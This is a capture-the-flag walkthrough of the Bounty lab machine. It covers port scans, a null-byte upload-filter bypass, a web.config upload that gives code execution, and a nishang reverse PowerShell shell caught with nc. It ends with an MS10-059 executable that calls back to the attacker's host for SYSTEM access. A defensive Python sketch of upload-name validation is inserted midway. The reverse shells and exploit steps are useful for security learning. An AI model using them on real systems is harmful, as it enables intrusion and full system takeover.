The box only had port 80 open, serving an application that allows file uploads while blocking asp, aspx and a few other file extensions.
I was able to bypass the upload filter using a null byte %00.jpg but the application generated an error giving a clue about something related to web.config.
After some research about web.config, I was able to find an article describing how to upload a web.config file with ASP code embedded and I was able to get a shell.
For privilege escalation, I was able to get SYSTEM using MS10-059.
# Nmap 7.80 scan initiated Sun Mar 8 22:08:29 2020 as: nmap -Pn -sC -sV -p 80 -oN nmap/Bounty_nmap.txt 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.040s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 8 22:08:50 2020 -- 1 IP address (1 host up) scanned in 21.20 seconds

# Nmap 7.80 scan initiated Sun Mar 8 22:08:50 2020 as: nmap -Pn -sU -oN nmap/Bounty.udp 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered

# Nmap done at Sun Mar 8 22:12:12 2020 -- 1 IP address (1 host up) scanned in 201.34 seconds
Enumerating HTTP
Port 80 just shows a picture. I saved the picture as merling.jpg and used strings, steghide and exiftool but didn't find anything.
Nikto
Nothing much was found with Nikto.
nikto -host http://10.10.10.93
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2020-03-08 22:18:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-03-08 22:24:28 (GMT-4) (344 seconds)
---------------------------------------------------------------------------
I tried uploading files with ASP and ASPX extensions and it failed. But when I uploaded the merling.jpg file it worked. Based on that, I used Burp proxy to intercept the request and used a null byte %00 to attempt to bypass the upload filter.
When I tried to execute the shellie.aspx file at http://10.10.10.93/UploadedFiles/shellie.aspx I got the following error.
I had no idea what to do from here, so I googled "IIS 7.5 web.config exploit" and, to my surprise, I found the following link stating that we can actually upload a *.config file containing ASP code and it would execute.
Here is the link:
Explanation of web.config as quoted from the link above:
Web.config
What is a web.config file?
A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.
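The two weaknesses used above are a filter that only looks at the last extension of the submitted name (so a null byte hides the real one) and a server that treats an uploaded web.config as configuration rather than data. The following is an added example, not the Bounty application's code or the linked article's: it models the blocklist filter and the null-byte truncation it fell to, next to an allowlist check that rejects control bytes, double extensions and server-reserved names. The extension sets and reserved names are assumptions for illustration.

```python
import os
import re
from urllib.parse import unquote

# Constructed model of the bypassed design: a blocklist on the submitted
# name's last extension. The page names asp and aspx; the "few other"
# extensions it mentions are not listed, so .config is deliberately absent.
BLOCKED_EXTENSIONS = {".asp", ".aspx"}  # assumption

# Hardened design: an allowlist of data-only types (assumption).
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

# Names IIS/ASP.NET interpret no matter what extension a blocklist sees
# (illustrative set, assumption).
RESERVED_NAMES = {"web.config", "global.asax"}


def weak_filter_accepts(filename: str) -> bool:
    """Blocklist check on the last extension only (the bypassed design)."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLOCKED_EXTENSIONS


def name_written_to_disk(filename: str) -> str:
    """Model the truncation the null-byte trick relies on: a C-string based
    file API stops at the first NUL, so the part after it never reaches disk."""
    return filename.split("\x00", 1)[0]


def hardened_filter_accepts(filename: str) -> bool:
    """Allowlist check over the whole basename."""
    # 1. Control bytes (including NUL) and path separators are rejected outright.
    if re.search(r"[\x00-\x1f/\\]", filename):
        return False
    base = filename.lower()
    # 2. Names the server treats as configuration or handlers are never data.
    if base in RESERVED_NAMES:
        return False
    # 3. Exactly one dot with an allowlisted extension: no double-extension tricks.
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    return "." + parts[1] in ALLOWED_EXTENSIONS


def evaluate(submitted: str) -> dict:
    """Run both filters on a form value as the browser/Burp would send it
    (URL-encoded in the request, decoded by the framework)."""
    decoded = unquote(submitted)
    return {
        "weak_accepts": weak_filter_accepts(decoded),
        "stored_as": name_written_to_disk(decoded) if weak_filter_accepts(decoded) else None,
        "hardened_accepts": hardened_filter_accepts(decoded),
    }


if __name__ == "__main__":
    # Constructed sample names mirroring the write-up's uploads.
    for name in ["merling.jpg", "shellie.aspx", "shellie.aspx%00.jpg", "web.config"]:
        print(name, evaluate(name))
```

The decisive difference is that the hardened check inspects every byte of the name rather than the suffix after the last dot, and it rejects web.config by name because its danger has nothing to do with its extension. Filename validation alone is still not enough: the upload directory should also have script execution disabled on the server so that whatever lands there is served as static content.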
Executed it via http://10.10.10.93/UploadedFiles/web.config
Started the listener on port 8008 (I edited the port in the nishang reverse TCP script).
Got a shell as merlin
Started a Python HTTP server:
# To serve the nishang reverse PowerShell script
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.93 - - [09/Mar/2020 00:21:47] "GET /pwsh.ps1 HTTP/1.1" 200 -

# Listener to capture the shell
rlwrap nc -lnvp 8008
listening on [any] 8008 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv> whoami
bounty\merlin
./windows-exploit-suggester.py -d 2020-03-06-mssb.xls -i sysinfo_bounty
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
I used MS10-059. A Google search for "MS10-059 github" takes you to the following link with an exe executable.
Download the executable to the target using certutil.
# On the target box
PS C:\users\merlin\documents> .\MS10-059.exe 10.10.14.3 9002

# On my Kali box
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\users\merlin\documents>whoami
whoami
nt authority\system

C:\users\merlin\documents>